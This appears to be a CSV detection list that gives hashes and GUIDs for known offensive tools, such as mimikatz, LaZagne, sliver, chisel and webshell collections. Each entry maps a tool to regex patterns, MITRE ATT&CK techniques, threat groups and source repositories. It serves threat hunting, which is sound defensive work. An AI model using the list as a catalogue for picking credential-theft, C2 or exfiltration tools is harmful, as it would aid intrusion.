"*Ed1s0nZ/cool/*",".{0,1000}Ed1s0nZ\/cool\/.{0,1000}","offensive_tool_keyword","C2 related tools","An anti-virus platform written in the Golang-Gin framework with built-in BypassAV methods such as separation and bundling.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Ed1s0nZ/cool","1","1","N/A","N/A","10","10","686","112","2023-07-13T07:04:30Z","2021-11-10T14:32:34Z","42760"
"*ed249df13376f8a9e1aa823772cb075c96d1876651927b239c18d665bfa39666*",".{0,1000}ed249df13376f8a9e1aa823772cb075c96d1876651927b239c18d665bfa39666.{0,1000}","offensive_tool_keyword","POC","CVE-2021-21972 POC exploitation","T1190 - T1059.001 - T1040","TA0001 - TA0003 - TA0009","N/A","Dispossessor","Exploitation tool","https://github.com/NS-Sp4ce/CVE-2021-21972","1","0","#filehash","N/A","7","5","491","146","2023-06-08T04:01:33Z","2021-02-24T11:14:58Z","42761"
"*ed2e54a7a57637f150701a4764bbece4af4bcbc563b9a0e61c017146b3bed284*",".{0,1000}ed2e54a7a57637f150701a4764bbece4af4bcbc563b9a0e61c017146b3bed284.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","42764"
"*ed2f501408a7a6e1a854c29c4b0bc5648a6aa8612432df829008931b3e34bf56*",".{0,1000}ed2f501408a7a6e1a854c29c4b0bc5648a6aa8612432df829008931b3e34bf56.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext   APIs   custom algorithms   databases   etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1555 - T1555.001 - T1555.003 - T1555.004 - T1003.001 - T1003.004 - T1003.005 - T1003.007 - T1003.008 - T1552.001","TA0006 - TA0009","N/A","Akira - AvosLocker - LockBit - GoGoogle - 8BASE - RansomEXX - Leafminer - Wizard Spider - APT3 - Scattered Spider - OilRig - MuddyWater - Inception - APT33 - TeamTNT - Tonto Team - Evilnum - CHRYSENE - GOLD DUPONT","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","#filehash","N/A","10","10","9941","2062","2025-04-10T14:24:35Z","2015-02-16T14:10:02Z","42765"
"*ed37fced451d290d9c5fa54fcf535408a01172a50ac8ad6a560e576b1f232802*",".{0,1000}ed37fced451d290d9c5fa54fcf535408a01172a50ac8ad6a560e576b1f232802.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","42766"
"*ed3e2cf7fe3797b0ec87b74568628f8a4d7ac1c4c5a29c6e169599ded4d1d947*",".{0,1000}ed3e2cf7fe3797b0ec87b74568628f8a4d7ac1c4c5a29c6e169599ded4d1d947.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","42767"
"*ed47878048a7624cdd5a73042c9bde820aa0befbb1908c3f2e4a1cbe5aad359f*",".{0,1000}ed47878048a7624cdd5a73042c9bde820aa0befbb1908c3f2e4a1cbe5aad359f.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","42768"
"*ed49a8c71ef4b0d5e362b0c4466f4c3cce1a8d2f641b6b994f949a144df30b76*",".{0,1000}ed49a8c71ef4b0d5e362b0c4466f4c3cce1a8d2f641b6b994f949a144df30b76.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","42769"
"*ed4d66eac260c54457ea1b9fa50be035dc89b32e7a318bff1296606413f25cbb*",".{0,1000}ed4d66eac260c54457ea1b9fa50be035dc89b32e7a318bff1296606413f25cbb.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER - Black Basta","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","42770"
"*ed565cd47f1e75dc1c53043d03631809f64c091293d10fb26f272ff74d419a6d*",".{0,1000}ed565cd47f1e75dc1c53043d03631809f64c091293d10fb26f272ff74d419a6d.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","42772"
"*ed59f3c5302dd8054c6f95575b26e7bb6365eb2d167ba97f6d8ee3bc5638dd57*",".{0,1000}ed59f3c5302dd8054c6f95575b26e7bb6365eb2d167ba97f6d8ee3bc5638dd57.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","42773"
"*ed5c0c94ccd4fb0029dbfc609f8fc57580856648a188f595134f12c28ed97490*",".{0,1000}ed5c0c94ccd4fb0029dbfc609f8fc57580856648a188f595134f12c28ed97490.{0,1000}","offensive_tool_keyword","SharpAVKB","Windows Antivirus Comparison and Patch Number Comparison","T1082 - T1518 - T1083","TA0007","N/A","N/A","Discovery","https://github.com/uknowsec/SharpAVKB","1","0","#filehash","N/A","4","1","58","24","2019-10-28T06:50:30Z","2019-10-14T12:44:22Z","42774"
"*ed627e5d0ac3faff24ef080462ada798749c5d7a9ecd6ffda2b2e14251de3784*",".{0,1000}ed627e5d0ac3faff24ef080462ada798749c5d7a9ecd6ffda2b2e14251de3784.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","42775"
"*ed68e081f359726e140c31e96c92da4aa363a976569f4f9357f73f738d534dd3*",".{0,1000}ed68e081f359726e140c31e96c92da4aa363a976569f4f9357f73f738d534dd3.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","42776"
"*ed696e567323b56a31408da5f6e12181ae0740bec1b23fc9be2817e51cf13235*",".{0,1000}ed696e567323b56a31408da5f6e12181ae0740bec1b23fc9be2817e51cf13235.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","42777"
"*ed72a475f9c8bb454e36a97155172424cd9892cbeba30bb6fc53cad973767fd1*",".{0,1000}ed72a475f9c8bb454e36a97155172424cd9892cbeba30bb6fc53cad973767fd1.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","42779"
"*ed8071b56d96c49d5c8b0500eb9a3a946e9d60846190ef8f33de873d23d0824e*",".{0,1000}ed8071b56d96c49d5c8b0500eb9a3a946e9d60846190ef8f33de873d23d0824e.{0,1000}","offensive_tool_keyword","dnspot","End-to-end Encrypted DNS Tunnelling and C2 framework","T1071.004 - T1090.002 - T1573.002","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/mosajjal/dnspot","1","0","#filehash","N/A","10","10","73","16","2025-02-01T08:13:29Z","2021-09-25T08:49:43Z","42780"
"*ED839154-90D8-49DB-8CDD-972D1A6B2CFD*",".{0,1000}ED839154\-90D8\-49DB\-8CDD\-972D1A6B2CFD.{0,1000}","offensive_tool_keyword","KrbRelay-SMBServer","acts as an SMB server (instead of DCOM) to relay Kerberos AP-REQ to CIFS or HTTP","T1557 - T1021 - T1205 - T1071","TA0006 - TA0008 - TA0010","N/A","Black Basta","Lateral Movement","https://github.com/decoder-it/KrbRelay-SMBServer","1","0","#GUIDproject","N/A","9","3","215","26","2024-10-08T14:55:59Z","2024-10-05T12:28:55Z","42781"
"*ED83E265-D48E-4B0D-8C22-D9D0A67C78F2*",".{0,1000}ED83E265\-D48E\-4B0D\-8C22\-D9D0A67C78F2.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","Dispossessor - Back Basta","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","0","#GUIDproject","N/A","10","10","1580","209","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z","42782"
"*ed85a47316a693661dd964ef58efb31bbe5ed97d2f9560021a220bbb912a9c2c*",".{0,1000}ed85a47316a693661dd964ef58efb31bbe5ed97d2f9560021a220bbb912a9c2c.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","42783"
"*ed87362886559097875401d60cbcb440d8cf6da80ad5a6cc36aa0e679ce7c0a6*",".{0,1000}ed87362886559097875401d60cbcb440d8cf6da80ad5a6cc36aa0e679ce7c0a6.{0,1000}","offensive_tool_keyword","Dispossessor","socks tools used by the ransomware group Dispossessor","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Dispossessor","C2","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","42784"
"*ed8aaac54cc040340e0bdb1fd8396c72399c26e8385c9778558378bdf3bd8ac4*",".{0,1000}ed8aaac54cc040340e0bdb1fd8396c72399c26e8385c9778558378bdf3bd8ac4.{0,1000}","offensive_tool_keyword","pretender","MitM sidekick for relaying attacks featuring DHCPv6 DNS takeover as well as mDNS - LLMNR and NetBIOS-NS spoofing","T1557 - T1046 - T1590 - T1557.002","TA0008 - TA0011 - TA0007 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/RedTeamPentesting/pretender","1","0","#filehash","N/A","7","10","1089","79","2025-02-19T08:14:57Z","2022-07-11T13:23:23Z","42785"
"*ed937bcd5dc05f1021aa83afdb47af266083ef47228e23a32292bad577c53191*",".{0,1000}ed937bcd5dc05f1021aa83afdb47af266083ef47228e23a32292bad577c53191.{0,1000}","offensive_tool_keyword","DNSExfiltrator","DNSExfiltrator allows for transfering (exfiltrate) a file over a DNS request covert channel. This is basically a data leak testing tool allowing to exfiltrate data over a covert channel.","T1041 - T1048","TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/Arno0x/DNSExfiltrator","1","0","#filehash","N/A","10","9","867","188","2024-04-29T20:20:43Z","2017-12-20T13:58:09Z","42787"
"*ed97a4ca8acde3b070985013333896a1c55fb5387233c2fdbefafeed2ccb9c74*",".{0,1000}ed97a4ca8acde3b070985013333896a1c55fb5387233c2fdbefafeed2ccb9c74.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","42788"
"*ed985694d5443f8df91836bf904b8ef8c360edbbda34b6cc50d454edcf1197b3*",".{0,1000}ed985694d5443f8df91836bf904b8ef8c360edbbda34b6cc50d454edcf1197b3.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","42789"
"*ed994cff2f59eddf328e72a6060180b724d931cb9b564327b4a5eab28cb5cc8c*",".{0,1000}ed994cff2f59eddf328e72a6060180b724d931cb9b564327b4a5eab28cb5cc8c.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","42790"
"*ed99b1d4757d0848ced6b91f18326c42127f6f79ad1cc7e7fafeee91388004e3*",".{0,1000}ed99b1d4757d0848ced6b91f18326c42127f6f79ad1cc7e7fafeee91388004e3.{0,1000}","offensive_tool_keyword","conpass","Continuous password spraying tool","T1110.001 - T1110 - T1078.001 - T1201","TA0006 - TA0007 - TA0005","N/A","N/A","Credential Access","https://github.com/login-securite/conpass","1","0","#filehash","N/A","10","2","181","17","2025-03-03T15:05:25Z","2022-12-15T18:03:42Z","42791"
"*ed9d3ee993fe0a36bb7a7fce3940112ea29eccca58165738a758c58a3fe0ae54*",".{0,1000}ed9d3ee993fe0a36bb7a7fce3940112ea29eccca58165738a758c58a3fe0ae54.{0,1000}","offensive_tool_keyword","HEKATOMB","Hekatomb is a python script that connects to LDAP directory to retrieve all computers and users informations. Then it will download all DPAPI blob of all users from all computers and uses Domain backup keys to decrypt them","T1003 - T1555.002 - T1482 - T1087","TA0006 - TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/ProcessusT/HEKATOMB","1","0","#filehash","N/A","10","6","510","59","2024-07-31T19:05:30Z","2022-09-09T15:07:15Z","42792"
"*eda049d723876d9783aa850feafc7aba3297ff8af282606d2a8c899ba591c7d7*",".{0,1000}eda049d723876d9783aa850feafc7aba3297ff8af282606d2a8c899ba591c7d7.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","42793"
"*eda3dc681554b274b5cdf9cdc4d1d2248a45ed61a3f309210d1a79bab4e53113*",".{0,1000}eda3dc681554b274b5cdf9cdc4d1d2248a45ed61a3f309210d1a79bab4e53113.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#filehash","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","42794"
"*eda5a3b5c4316ec711ae975cdf6a483e244ac195e06254a0e9bade484d9c0533*",".{0,1000}eda5a3b5c4316ec711ae975cdf6a483e244ac195e06254a0e9bade484d9c0533.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","42795"
"*eda5a3b5c4316ec711ae975cdf6a483e244ac195e06254a0e9bade484d9c0533*",".{0,1000}eda5a3b5c4316ec711ae975cdf6a483e244ac195e06254a0e9bade484d9c0533.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","42796"
"*edaa2e28eee643e72776396155001db13f288d9bc64e57057127a09c1d57c9a7*",".{0,1000}edaa2e28eee643e72776396155001db13f288d9bc64e57057127a09c1d57c9a7.{0,1000}","offensive_tool_keyword","ShellServe","Multi-client network fileserver with integrated shell functionality crafted in C using system calls for efficient and direct file and command processing","T1059 - T1505 - T1046 - T1569","TA0002 - TA0007 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/7etsuo/ShellServe","1","0","#filehash","N/A","6","","N/A","","","","42797"
"*edb161280fe76c89768cab2f9493295671042046f106a7686854f8b5ed118249*",".{0,1000}edb161280fe76c89768cab2f9493295671042046f106a7686854f8b5ed118249.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","#filehash","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","42798"
"*EDBAAABC-1214-41C0-8EEE-B61056DE37ED*",".{0,1000}EDBAAABC\-1214\-41C0\-8EEE\-B61056DE37ED.{0,1000}","offensive_tool_keyword","Stifle",".NET Post-Exploitation Utility for Abusing Explicit Certificate Mappings in ADCS","T1550.003 - T1552.004 - T1606.002","TA0006 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/logangoins/Stifle","1","0","#GUIDproject","N/A","7","2","140","9","2025-02-10T04:58:46Z","2025-02-08T06:13:43Z","42802"
"*edbafeb3a54bcacd2f4b9a1beec023c20ed6346b0ba2c32a59a6d2a0c8b6cb6c*",".{0,1000}edbafeb3a54bcacd2f4b9a1beec023c20ed6346b0ba2c32a59a6d2a0c8b6cb6c.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","42803"
"*edcc3c97475aa95c19c8c08124fe6b9c5aac05ce4f253af391b7b1710d04b336*",".{0,1000}edcc3c97475aa95c19c8c08124fe6b9c5aac05ce4f253af391b7b1710d04b336.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","0","#filehash","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","42804"
"*edce2d6ebcdab01ffa6ab278bab2c628fe405c82452de36a531a6cbac98541b0*",".{0,1000}edce2d6ebcdab01ffa6ab278bab2c628fe405c82452de36a531a6cbac98541b0.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","42805"
"*edcf68c388027b82dc8db46324c2cc67105a90f3689a200972331deb5dcdb887*",".{0,1000}edcf68c388027b82dc8db46324c2cc67105a90f3689a200972331deb5dcdb887.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","42806"
"*edd2c3b117bf18e520fc98063528a003b8958a15f731fe7646cfab0b433bf69d*",".{0,1000}edd2c3b117bf18e520fc98063528a003b8958a15f731fe7646cfab0b433bf69d.{0,1000}","offensive_tool_keyword","SharpAVKB","Windows Antivirus Comparison and Patch Number Comparison","T1082 - T1518 - T1083","TA0007","N/A","N/A","Discovery","https://github.com/uknowsec/SharpAVKB","1","0","#filehash","N/A","4","1","58","24","2019-10-28T06:50:30Z","2019-10-14T12:44:22Z","42807"
"*edd9d1b4-27f7-424a-aa21-794b19231741*",".{0,1000}edd9d1b4\-27f7\-424a\-aa21\-794b19231741.{0,1000}","offensive_tool_keyword","LsassReflectDumping","leverages the Process Forking technique using the RtlCreateProcessReflection API to clone the lsass.exe process. Once the clone is created - it utilizes MINIDUMP_CALLBACK_INFORMATION callbacks to generate a memory dump of the cloned process","T1003.001 - T1555.003 - T1077","TA0006","N/A","N/A","Credential Access","https://github.com/Offensive-Panda/LsassReflectDumping","1","0","#GUIDproject","N/A","10","2","198","27","2024-10-19T08:16:13Z","2024-10-17T14:57:30Z","42808"
"*eddd8cf62034d52903edacb5d07fc26220597cc98395d200fe859bd88936fc70*",".{0,1000}eddd8cf62034d52903edacb5d07fc26220597cc98395d200fe859bd88936fc70.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","42809"
